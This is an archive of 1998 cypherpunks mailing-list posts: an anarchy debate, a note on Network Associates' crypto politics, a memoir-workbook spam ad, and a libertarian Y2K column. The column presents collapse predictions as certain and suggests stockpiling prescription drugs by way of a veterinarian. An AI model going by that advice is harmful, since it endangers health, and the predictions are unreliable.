In-Reply-To: <199811171328.OAA17299@replay.com>
Message-ID: <3651C408.69196C1F@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> Soren writes:
> > Simple,  they would work anarchically.  If the guy whose house is
> > burning down is an assh*le, then let it burn.
> 
> Now you know why Choate fears anarchy.

Fortunately for the alleged assh*le, there are likely lots of people
(i.e. _firemen_) who are willing to come and put out his fire, if Mr.
assh*le has contracted with them or someone else who has in turn
contracted with them.  If they didn't, they would be marked (correctly)
assh*les, and nobody would contract with them anymore, and they'd get
real poor real fast.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 18 Nov 1998 03:35:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811171328.HAA15035@einstein.ssz.com>
Message-ID: <3651C7E5.2C737F0B@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Mon, 16 Nov 1998 17:36:49 -0500
> > From: Bill Stewart <bill.stewart@pobox.com>
> > Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
> >
> > Just because you don't have a social institution that announces
> > that it has the job of killing anybody who competes with it or
> > fails to obey its proclamations of the will of the majority
> > doesn't mean you don't have social institutions.
> 
> Nobody claimed that Bill, straw-man.

Now wait a minute, which side was it that said that an "anarchistic
society" was an oxymoron?  You know, that we can't have a society
without a state?  The state is nothing but an organization which kills
anyone who doesn't obey its will (however that will is determined, or
however many orders it will give you before disobedience is fatal).  By
saying this, you *are* saying that it is necessary to "have a social
institution that announces that it has the job of killing anybody who
competes with it or fails to obey its proclamations of the will of the
majority" in order to have *any* social institutions (i.e., to have a
society).

*We* weren't the ones who raised that strawman. ;)

> Explain how it works, it's that simple (and repeated for about the umpteenth
> time).

We have, haven't you been listening?

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 18 Nov 1998 05:31:24 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Question about anarchic systems and natural disasters (fwd)
Message-ID: <199811172004.OAA16707@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Brown, R Ken" <brownrk1@texaco.com>
> Subject: RE: Question about anarchic systems and natural disasters (fwd)
> Date: Tue, 17 Nov 1998 13:30:18 -0600

> No-one's yet noticed that my Jim's house burning down is a problem for
> his neighbours.

I noticed, it's been interesting the way it was dealt with...

> Of course, that applies to cities, not to the country - but cities are
> where it's at. 

We have volunteer fire depts. here in Texas (and most other states I've
been in). Typicaly they have no equipment, no training, and no money.

But, hey, they'll save the slab.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 18 Nov 1998 04:15:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811171524.JAA15577@einstein.ssz.com>
Message-ID: <3651CB97.A1032AAB@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Forwarded message:
> 
> > Date: Tue, 17 Nov 1998 16:17:12 +0100
> > From: Anonymous <nobody@replay.com>
> > Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
> 
> > This is the central disconnect between you and the other side.  You
> > obviously have as a core assumption that people should be /required/
> > to do what is best for their neighbor.
> 
> Not even close junior.

Is that so?

Are you saying, then, that you aren't in favor of the "right to medical
care", you were so big on earlier?  You're saying that you don't support
taxation to pay for this universal medical care?  That's not what you
said before. :)

> > Most anarchists would reject that assumption.
> 
> As would I.
> 
> >  Instead, an anarchist would say "The best thing I
> > can do for my neighbor (and the only thing I 'owe' him) is to leave
> > him alone."  That is, I have no affirmative obligation to do anything
> > for my neighbor to make his life better.
> 
> You also have no right to do anything to make their life worse either.
>
> THAT is my objection to anarchism, it has zero, nada, null, nul, nil,
> none, zipo recognition of others peoples rights and an individuals
> responsibility to respect them.


Since when have we said this?  Just because I'm not *obligated* to help
someone doesn't mean that I'm going to do anything to make his/her life
worse.  The lack of an obligation to help does not necessarily imply the
existance of one to harm.

Furthermore, if you'd bothered to read Anon's next paragraph (and you
must have, you cut it out), you'd have seen an example of why it is in
one's self-interest to help one's neighbors.  We respect others because
doing so increases the odds of their respecting us.  This isn't a
particularly complicated line of reasoning, and just about everyone
understands it (unless, of course, they're anti-social statists, who
imagine that force is the best solution to every interaction).

> It further refuses to recognize that to help others is to help oneself in
> many cases.

You really *do* have a reading disability, don't you?  Here, I'll quote
what you appear to have missed:

Anon wrote:
:All that being said, it may be in my own best interests to do "what is
:best" for my neighbor; then, if my house should catch fire, I have a
:much better chance that my neighbor will help extinguish the fire.

Ok, Jim, here it comes.  The meaning of this paragraph is: to help
others is to help oneself in many cases.

You think we don't recognize this fact?  Hell, we *rely* on it.

> Get your facts straight (but that's probably asking too much).

Read the entirety of someone's post without reading what you *want* the
author to have said into it.  Hell, just try reading *all* of a post
before you say such silly things (but that's probably asking too much).

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 17 Nov 1998 21:53:43 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Question about anarchic systems and natural disasters (fwd)
Message-ID: <199811171328.OAA17299@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Soren writes:
> Simple,  they would work anarchically.  If the guy whose house is
> burning down is an assh*le, then let it burn.

Now you know why Choate fears anarchy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 17 Nov 1998 23:58:24 +0800
To: cypherpunks@cyberpass.net
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811171517.QAA25352@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:

> Bill Stewart <bill.stewart@pobox.com>

> > Absence of coercion doesn't mean absence of cooperation.
> 
> Please demonstrate what about anarchy will coerce (there is no other term)
> individuals to do what is best for their neighbor.

Jim,

This is the central disconnect between you and the other side.  You
obviously have as a core assumption that people should be /required/
to do what is best for their neighbor.  Most anarchists would reject
that assumption.  Instead, an anarchist would say "The best thing I
can do for my neighbor (and the only thing I 'owe' him) is to leave
him alone."  That is, I have no affirmative obligation to do anything
for my neighbor to make his life better.

All that being said, it may be in my own best interests to do "what is
best" for my neighbor; then, if my house should catch fire, I have a
much better chance that my neighbor will help extinguish the fire.

>                                                    In the process you will
> need to demonstrate as well why other systems prevent or prohibit such
> expression currently.

Non sequitur.  I'm pretty nice to my neighbors now.  Aren't you?
This has nothing to do with any government.

The defenders/proponents of anarchy here aren't saying that government
prevents the function of any of the anarchist mechanisms.  Rather that
government is an unnecessary and onerous burden on its subjects.

> Explain how it works, it's that simple (and repeated for about the umpteenth
> time).

What's to explain?  As has been described on this list countless 
times, the examples of natural 'anarchist' behavior abound in everyday
life.  Who makes you get up each morning and go to work?  What is
it that (only) government does that makes it possible for you to go
to the grocery store, or buy gasoline, or go to the movies, or sell 
your professional services, or any of the other countless aspects of
life that would go on with or without government?

> I find another aspect of anarchism pretty interesting, that is the level of
> cooperation and homogeneity it would require for people to work together.
> They have to give up various expressions of their religions and personal
> beliefs in order to participate, othewise they let the assholes house burn
> or whatever.

Why so?  I do not share a religion with any of my neighbors, yet I would
gladly help if one of their houses was on fire.  I do not share a 
religion with most of the people I work with (or race, gender and other
attributes); yet I have no difficulty working with most of them.  What 
"expressions" would I see from my neighbors were it not for the Wise and
Just Hand of Government?

Or do you mean I should be /Required/ to live and work with people whose
personal beliefs or religion I find offensive or repugnant?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Wed, 18 Nov 1998 05:23:12 +0800
To: zeroes and ones at <cypherpunks@cyberpass.net>
Subject: Re: Question about anarchic systems and natural disasters (fwd)
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE2013F8596@MSX11002>
Message-ID: <3651EA63.6F2CC61E@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Brown, R Ken wrote:
> 
> > No-one's yet noticed that my Jim's house burning down is a problem for
> his neighbours.  Not just for the fear and distress it causes them but
> because the fire might spread to their houses.  Which is why we have
> fire brigades. And why they are nearly always paid for out of tax.
> Almost the last thing in the world anyone does privately.
> 
> Of course, that applies to cities, not to the country - but cities are
> where it's at.
> 
Tax supported fire brigades are a very recent invention, and are often
still privately run (at least in my neck of the woods).  In the above
circumstance (my [sic] Jim's house), one would have to weigh the
relative risks against the possible rewards.  If Jim is such an assh*le
to live next to, I might be more inclined to soak my own house in the
expectation that Jim will be hitting the road after his house has burned
down.

Given that humans tend to go in for self-organization, there are likely
to be a multitude of societies that naturally form in an anarchy. 
Presumably they would be heavily ghettoized a-la Snow Crash, but there
will always be plenty of room for various stripes of
socialist/neo-fascists to form their own societies.  What they can't do
with impunity, is tell me that I am, ipso facto, a member of their
society.  Undoubtably they would be inclined to try, but in the absence
of a highly organized and militarized support group, in the form of the
'monopoly merchants', they will have a harder time of it.

Personally, I believe that states inevitably arise out of anarchic
assemblages of societies. Chalk it up to human frailty. Where anarchy is
beneficial, is in terminating obsolete state structures in order to
allow newer and (hopefully) more appropriate social structures to form. 
The current form in the US is rather pathetic.  A 'great society' that
has as its paramount goal the perpetuation of a 19th century
hierarchical model for human interaction. I would have said 18th
century, but Abe took care of the restructuring 130 years ago.

In the 19th century, the model for state formation was based upon
geographical limitations. The technologies of the day meant that the
territory you could force to knuckle under was severely constrained.

Starting from scratch today, it would make more sense to create
societies out of like minded individuals from wherever they live on the
planet (and off it?).  The phylums of the Diamond Age are, IMHO, a good
model for this.  This should give the socialists among us great cheer
and hope.  Rather than attempting to coerce all individuals within an
arbitrary geographical region to knuckle under and pay taxes. I would
suggest a good PR and proselytization campaign with the intention of
recruiting good tax-paying and benefit consuming suckers -- er ...
subscribers, wherever they may live.

Its not like this model hasn't been successful in the past, viz: the
Mormons, Scientologists, Roman Catholic Church, Marxism, the Moonies,
Amway, Herbal Life, and certain aspects of the music industry. Think of
it, rather than trying to disenfranchize 50 million north americans,
there exists already a highly indoctrinated group of people in China
(some 2 billion at last count) who would gladly subscribe to your brand
of socialism, even if just to get away from their current model. At the
very least, this would breathe new life back into Radio America. It
would also legitimize the need for US military troops stationed in 100+
locations around the world.  They could be seconded to the IRS to
enforce compliance.

On the other hand, maybe I'm missing the point. Maybe the use of
coercion and force *is* the raisson d'etre for the state.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 18 Nov 1998 09:20:41 +0800
To: cryptography@c2.net
Subject: FC: More on Network Associates and its crypto-politics
Message-ID: <v04020a04b277c6d69429@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: declan@mail.well.com
Date: Tue, 17 Nov 1998 17:44:01 -0500
To: politech@vorlon.mit.edu
From: Declan McCullagh <declan@well.com>
Subject: FC: More on Network Associates and its crypto-politics
Mime-Version: 1.0
Sender: owner-politech@vorlon.mit.edu
Reply-To: declan@well.com
X-Loop: politech@vorlon.mit.edu
X-URL: Politech is at http://www.well.com/~declan/politech/

Cabe Franklin <cabe.franklin@cbpr.com> forwards this statement from Wes
Wasson, director of marketing for Network Associates' security division:

>"NAI officially withdrew from the Key Recovery Alliance in late 1997. In May
>of 1998, NAI acquired Trusted Information Systems, which had been an active
>member of the KRA. NAI subsequently reliquished the leadership role TIS had
>taken in the organization. NAI Labs' TIS Advanced Research Division
continues
>to monitor the KRA's activities from a technical perspective, but Network
>Associates in no way advocates mandatory key recovery."
>- Cabe Franklin (NAI PR)
>415-975-2223

TIS supports export controls on encryption products. My article:
 http://www.well.com/user/declan/pubs/cwd.shadow.cryptocrats.0298.txt

-Declan


--------------------------------------------------------------------------
POLITECH -- the moderated mailing list of politics and technology
To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
subscribe politech
More information is at http://www.well.com/~declan/politech/
--------------------------------------------------------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mschneider <life229@hotmail.com>
Date: Wed, 18 Nov 1998 21:17:41 +0800
To: <cypherpunks@toad.com>
Subject: Discover your family SECRETS!
Message-ID: <419.436117.30631192life229@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain





Your Parents and Grandparents tell the real story of their lives with the help of 
                MY LIFE & FAMILY MEMORIES WORKBOOK!
           "A Guide For Writing Your Personal And Family History"

Designed with careful thought, this unique Workbook provides 135 pages of step by 
step 
instruction.
                      It's Simple!  It's Easy!  It's Fun!  It's only $24.95!

Your parents and grandparents will be deeply moved that you think their life story
is important enough to be saved for future generations.

Can be shipped direct to your loved one in a decorative Christmas Gift Mailer with 
a gift card enclosed.

HURRY!  IN TIME FOR CHRISTMAS!
ORDER NOW 
  by FAX:  Simply print out this order form and fax it to 
(407) 349-2921 
Attach your check and make check payable to:  My Life & Family, Inc.
   for $24.95.  FL residents add 6% sales tax for a total  of $26.45

  or CALL  1-407-349-2921  We can take Checks by Phone.

Name: _______________________________________________________________

Street Address: ________________________________________________________

City: ____________________________State: _____________ Zipcode:  __________

YOUR Phone Number: _______________________________________

YOUR Email Address:________________________________________

Bank Name:_____________________________Check #________Amount:__________

Address:______________________________________________________________
  
#'s at bottom of check from left to right:_______________________________________

 YES!  Enclose gift card signed as follows:____________________________________

SHIP TO:  Name if different from above: 
_______________________________________

Street Address:_________________________________________________________

City:_____________________________State:_____________ Zip  Code:___________

Tape Check Here to Fax to (407) 349-2921

Or mail to:
ML&F
PO box 1290
Geneva, Fl  32732




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 18 Nov 1998 18:46:34 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: FC: More on Network Associates and its crypto-politics
In-Reply-To: <v04020a04b277c6d69429@[139.167.130.246]>
Message-ID: <199811180930.EAA005.87@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <v04020a04b277c6d69429@[139.167.130.246]>, on 11/17/98 
   at 07:35 PM, Robert Hettinga <rah@shipwright.com> said:

>TIS supports export controls on encryption products. My article:
> http://www.well.com/user/declan/pubs/cwd.shadow.cryptocrats.0298.txt

I doubt that TIS really cares one way or the other so long as they keep their fat government contracts. Of course those same contracts require keeping the government happy (ie: supporting GAK), TIS and others (being the corporate whores that they are) will sell out their own mothers (and the rest of us along with them) if it looked good on the bottom line.

A real shame that PGP had to get mixed up with these vipers.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 18 Nov 1998 23:21:21 +0800
To: cypherpunks@cyberpass.net
Subject: Nov. 22 bonus column - Year 2000
Message-ID: <v04020a04b278792c80c9@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Wed, 18 Nov 1998 00:29:09 -0700
Date: Tue, 17 Nov 1998 23:28:33 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Nov. 22 bonus column - Year 2000
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/596
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    DUE TO LENGTH, PLEASE CONSIDER THIS YOUR BONUS ESSAY FOR NOVEMBER
    FOR IMMEDIATE RELEASE DATED NOV. 22, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    I don't know nothin' 'bout no Y2K

    OK, I admit it: I've been ducking the "Y2K" question.

  It's the most frequent inquiry I get, these days. And last weekend, while
participating in an electronic chat room organized by the Liberty
Roundtable, I had the questions come up several more times: "What do you
see happening in the Y2K crisis? To what part of the country should we move
to be safest?"

  For those who have been in a cave, "Y2K" is shorthand for the problem
that develops because -- computer memory having been at a premium -- the
programmers who set up many of our mainframe computers back in the 1970s
and '80s created only a two-digit field for "year."

  Now -- starting April 1, 1999, if not sooner -- operators are going to
try to program the computers that monitor our utility grids and phone
systems, the factory machinery that generates "just-on-time delivery" of
goods, even our railroad and airport switching equipment, giving those
machines their instructions for the first quarter of the year "00."

  But (pardon my anthropomorphing) many of those computers will "assume"
the year 00 happened 99 years ago.

  Anecdotes are already circulating about mortgage holders being billed for
99 years of delinquent interest, or supermarket debit machines rejecting as
"expired" brand new debit cards which carry expiration dates ending in "00"
or "01. "

  So far, opinion among thoughtful people has been split on the likely
repercussions. Some perfectly wise folks argue that our economy and
technology are the most innovative and resourceful ever devised. Even if
your bank's ATMs go on the fritz for a couple of days, even if the railroad
switching equipment bogs down and produce deliveries to your supermarket
grow spotty for a few weeks, armies of well-paid technicians will hurl
themselves into developing "work-arounds."

  To this way of thinking, survivalists who foresee the collapse of large
segments of our urban culture, putting a premium on ownership of a cow and
a well and a garden for the first time in 50 years, are merely engaging in
wishful thinking. Generally a bunch of Bible-thumpers (as this line of
thought goes), they would find it mighty handy for some kind of cosmic rain
of brimstone to wipe away the urban Sodom and Gomorrah they view as the
cause of all their problems, proliferating as that urban culture does the
legions of the socialists, the welfare queens, the abortionists, the enviro
bug-worshippers, the gun-grabbers. How fitting and handy to envision them
all killing each other off, fighting over the last moldy crust of bread.

  And, if the Y2K "crisis" were about to occur in perfect isolation, that
argument would hold some water (even if this revelation of a nation divided
into urban-versus-rural, East-versus-West, gun-lover versus gun-hater,
would be worth some further study, all by itself.)

  But remember, Y2K is "shorthand." And as it turns out, it stands for a
lot more than just "Year 2000."

  The problem is that -- not exactly simultaneously, but all within the
next couple of years -- a few other problems are likely to crop up. Without
predicting a specific order:


    #  #   #

  1) The fractional reserve banking system that dates back to the creation
of the Federal Reserve in 1912-13 is in deep crisis. Buoyed by the supposed
guarantee that the International Monetary Fund (our long-suffering friends,
the U.S. taxpayers) would bail out any failures, our "private" bankers (and
those of Japan) have been recording trumped-up double-digit returns by
loaning billions to such bankrupt chicken farms as Malaysia, Indonesia,
Russia,  Brazil, and Mexico.

  These loans are no good. And they are pyramided and leveraged atop one
another like something out of Dr. Seuss. In this country, too, the pursuit
of ever-higher returns and the presumption that everyone can live the good
life on credit have encouraged foolish loans and investments based on the
notion that the federal government "insures all deposits," and that we can
always pay off our debts with that raise we hope to get next year.

  Once these assumptions start to unravel, the only debate will be whether
to describe the fallout with references to "dominoes," or that old
favorite, the "house of cards."

  Remember, as Jimmy Stewart explains to his depositors every year in "It's
a Wonderful Life," the current system is based on the assumption (are you
noticing that word crop up a lot?) that only a small percentage of
depositors will ever want to take all their money out at the same time.
Otherwise, the banks would be, well, bankrupt. This kind of fraud is only
legal because the government specifically licenses people to do it, on the
theory that it "creates more credit, to promote economic growth."

  2) Then comes that old stalwart, the New York Stock Exchange. Prices
there have been many times what can be justified by traditional
price-to-earning ratios for years. That sounds arcane, but what it means is
that few investors are buying stocks these days because they've always
wanted to own a piece of  Hammermill or Coca-Cola, and look forward to
reading the annual reports and living off the dividends in their golden
years.

  Dividends? Mere pennies! Folks buy these stocks today because the guy
who's selling them made an 18 to 21 percent return in 1997, and the buyer
hopes to realize 18 to 21 percent when he sells them in the year 2000.

 When the holder of a mutual fund can no longer even tell you what products
or services are offered by the underlying firms that issued the stocks in
his or her "portfolio," what you have is a "bubble." Think tulip bulbs,
Everglades building lots, Cabbage Patch dolls, baseball cards, beanie
babies.


    #   #   #

  3) Today's dollar is intrinsically worthless. First it was made of gold;
then it said "pay to the bearer in gold;" then silver, now it's a
certificate redeemable for exactly nothing. Dollar-denominated Treasury
bonds are also intrinsically worthless. They are merely a promise to tax
our children or grandchildren to pay us back in still more paper --
Libertarians call them "extortion futures."

  Bill Clinton is one of the luckiest men in history ... so far. Most
rational (non-Keynesian) economic models would predict that -- at the rate
at which the United States has been printing and passing worthless green
paper for the past 30 years -- we should be in the midst of a
hyperinflation that would make the Weimar Republic look boring. But the
funniest thing happened: All over the world, people love and respect
America as the font of freedom, and figure the dollar must really be worth
something -- certainly more than their worthless domestic ruble or zlotny.
So they hide dollars in their mattresses. Those dollars don't come back to
these shores to bid up the price of American goods. So we're fine ... so
far.

  But there's a reason why the guys who get arrested by your local bunko
squad are called "con artists." Their stock in trade is "confidence."

  Remember Y2K? Imagine now that the ATM machines stop working. Since the
nation's major railroad switching yards are now entirely computerized --
the old manual switches were torn out years ago -- the grocery store runs
out of fresh produce. Some computer messes up at the sewage treatment
plant, and before they can figure out a manual override some sewage backs
up into the reservoir. Suddenly you're warned to boil your cooking water,
like some barefoot Third World peasant. Without explanation, the phones go
dead.

  Long lines form as folks start panic-buying remaining supplies of
gasoline, kerosene lanterns, and canned goods -- price no object. There are
a few fistfights over the last rolls of toilet paper. Pressed by jealous
mobs to "do something," blustering politicians declare that anyone who
stores too much stuff is a "hoarder." Neighbors are encouraged to turn in
neighbors -- offered a reward from the seized goods when they're
"redistributed."

  Every electronic alarm in the city goes off all at once, leaving police
and fireman scurrying around, clueless. Some looting starts -- after all,
it's the "hoarders" who are the real criminals, right? TV pictures of all
this go out overseas, until the broadcasts are limited "to prevent panic."

  What has just been lost? "Confidence." Now folks want to draw out their
bank accounts in cash. They want to sell their stocks ... but how can
everyone sell when the prices are falling so quickly that there are no
buyers, and the phone lines to your broker are tied up for days on end?

 4) There is no "Social Security Trust Fund." The thief you keep sending
back to Congress helped them spend it all. Already, the retirement age is
being raised, and there's serious talk of "means testing" payments -- only
making full payments to the drunks and losers and compulsive gamblers who
accrued no other savings or assets. Kind of like taxing all the industrious
little ants, but only paying off the lazy grasshoppers. Sound like a
"guaranteed annuity" to you?

  Assurances of ongoing "Trust Fund" solvency are based on the optimistic
assumption (there's that word again) that Social Security payments by
younger workers will continue at current levels.  But what if there's a
recession, with big layoffs? What if the computers at the IRS are rumored
to be down as of late 1999? What if lots of people decide to just stop
filing and paying federal taxes in early Year 2000, on the theory, "They're
off line, anyway. If we ALL stop, they can't come find ALL of us"?

  (This would never have happened in the 1950s, of course, when American
taxpayers -- generally paying less than 5 percent of gross income so you
could still support a family on one salary -- considered it "our"
government and were proud to do their patriotic duty at tax time. But since
then the liars have brought us Vietnam, Watergate, Chinagate, Filegate,
Ruby Ridge, and Waco ... IRS auditors and drug police routinely referring
to average Americans as "scum" and gleefully seizing our homes, businesses
and bank accounts, tens of thousands of young people jailed for marijuana
despite popular votes to legalize the stuff, defendants railroaded by smug
federal politician-judges without even being allowed to read the Bill of
Rights to their juries.

  Still consider it your "patriotic duty" to feed this beast with half of
what you earn? Or did you think your pal the congressman was suddenly,
desperately searching for "an alternative to the IRS" just out of the
goodness of his heart?)

   And what happens now to the carefully-drawn charts that show Social
Security is "sound until the year 2012"?


    #   #   #

  Irresponsible speculation?

  If so, I'm not alone. Appearing in Las Vegas on Tuesday, Nov. 17, U.S.
Sen. Bob Bennett, R-Utah, chairman of a Senate Special Committee on the
Year 2000 Technology Problem, said turn-of-the-century computer glitches
could cause "an economic downturn" in the United States and abroad.

  "Potentially, this could tie up huge parts of the economy," Sen. Bennett
told John G. Edwards of the Las Vegas Review-Journal, after a private
meeting with executives at the Comdex computer trade show. "There will be a
problem. There is no question that we can't fix everything that needs to be
fixed (over the next 14 months)."

  Sen. Bennett told the newspaper he believes less developed countries in
Asia, Africa and South America will be most affected by Y2K problems,
though they're reportedly "working hard" to resolve the computer glitches.
"My current assumption is that the United States will overcome this without
overwhelming, crippling problems," the senator proclaimed.

  Then he said he is also concerned about how the millennium bug will
affect the health care industry.

  "I wouldn't want to get sick in some rural hospital," the senator said,
cheerily.

  Meantime, the Sacramento Bee reported (also on Nov. 17) results of an
August poll that shows most California cities and counties have a plan to
eradicate the year 2000 bug ... "but less than half have set aside the
money to pay for it."

  Feeling reassured?

  Into this potential maelstrom, toss three wild cards:

  1) If Americans, hypothetically told at some future date that stocks and
bonds have fallen to one-third of their previous nominal values, could be
counted on to behave like sophisticated, diversified investors, saying "Oh
well, you win some, you lose some," then the market could indeed fall by
two thirds without causing a meltdown.

  But the behavior of large groups of people, once they start moving, is
rarely so rational. Would you want to be the last one on your block to cry
"Sell"?

  When a market crashes, folks lose their jobs. What happens then to folks
who have no hard savings or supplies but plenty of debt ... who have barely
been keeping their heads above water? What liberties -- yours as well as
theirs -- would they then gladly trade for a steady supply of hot porridge?

  2) The kind of people who gravitate to government "service" never
voluntarily accept blame, but they (start ital)are(end ital) always looking
for ways to expand their power. Can you spot any aspects of these "Y2K"
scenarios that might give government agencies an excuse to seize more
power; to further restrict our freedoms under the guise of "offering relief
and restoring order"; and then to blame the whole situation on someone
else. "Greedy capitalists," perhaps, who have been operating with "too
little regulation"?

  3) We will be increasingly reassured that "the best minds" are hard at
work re-writing computer code to prevent any of this from happening. But
computer nerds and denizens of the Internet are, in my experience, the most
free-thinking, libertarian ... even anarchist residents of our little
global village. They are immensely confident in their self-sufficiency. And
they do not like Big Brother -- especially when he threatens to mess with
their privacy and freedom.

  So ... what if a few of them are only (start ital)pretending(end ital) to
fix the problem? It may take a village to raise a socialist, but it
wouldn't take many Y2K saboteurs to seize this opportunity to "topple the
state."


    #   #   #

  A long way around to a relatively short answer: No, I'm not a
professional financial advisor. But yes, I know exactly what is going to
happen. Everything listed above is going to happen. I just don't know
(start ital)when(end ital) each thing is going to happen, or in what
particular order -- which is what you really need to know, if you think
about it.

  But since there's no real penalty for being "too prepared" -- other than
perhaps looking a bit foolish -- I will fearlessly give a little
(absolutely amateur) advice, which should apply in the face of almost
(start ital)any(end ital) unforeseen emergency. (And if you start preparing
yourself for the smaller emergencies now, at least you'll be part-way
home.)

  Pay down your debts. Turn a hobby into a second, part-time business ... a
small but separate income stream. Diversify. Owning a bunch of "funds" with
different names, which are in fact all dollar-denominated electronic blips
at some government-regulated bank or brokerage house, is not sufficient. Do
you own any bullion-value gold coins (not coins with grossly-inflated
"collector value," but coins priced at no more than twice their meltdown
worth)? Have you hidden away any bags of "junk silver" (pre-1965 real
silver dimes and quarters, now selling at about four times face value)? Do
you have a supply of greenbacks somewhere other than "in the ATM?" Enough
to live on for a week? A month?

  Rich folks can look into Swiss annuities. But even those of moderate
means can think about a beat-up looking American pickup truck ... with
enough dough left over to stockpile an extra water pump, an extra fuel
pump, extra tires and wheels, an extra battery ... and some wrenches, you
yo-yo.

  Don't panic. Don't sell everything and move somewhere to become an
unemployed stranger ... unless you really have the assets, the manpower,
and the handyman skills to set yourself up right. Do consider whether you
could dig a well (or drink out of the creek) and plant a vegetable garden
where you live, should things get tough for a time. If not, do you have
friends or relatives within driving distance, where such things are
possible? Would they take you in if you arrived as an unwashed beggar? For
how long?

  But what if you were to contact them now, asking permission to store some
supplies there, and even to help finance their plans to fix up a room in
the loft, to till and fence a bigger garden, or to share the costs and
ownership of a four-wheel-drive vehicle? What then?

  Do you have water and non-perishable food stored to get you through a
week? A month? (Freeze-dried gourmet camper's fare is fine for the
well-heeled, as are surplus Army MREs. But bulk rice, oats, and dried peas
in plastic tubs are surprisingly cheap, if you shop around.) More than a
week's supply of toilet paper, soap, and other hygiene products? Pet food?

  The doctors and insurance companies don't want you to stockpile the
prescription medicines you legitimately need, do they? How hard have you
worked at outsmarting them? As a last resort, think "veterinarian."

  Do you have alternative ways to heat and light your home, if the power
were to go down? (Residents of blizzard country will actually have a head
start, here.) If not, is that because you look forward to someday living in
a "government resettlement camp"?

  Could you protect your family and belongings from home invaders, if the
police could not be reached? Would your neighbors help? Would you help
(start ital)them(end ital)? Do you even know their names?

  Do you own any firearms? Are they listed on government pre-confiscation
lists? Why? Do you know why shotguns and handguns are generally better
home-defense weapons than rifles? Do you know with what types of bullets or
shells it's best to load such weapons for home defense? Got any? Why not?
Afraid that once you start to learn new stuff it might become a habit?

  Dying during a crisis is not the worst thing that can happen to you. I
imagine that watching the suffering of those who counted on you to protect
them can be much worse.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***



Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

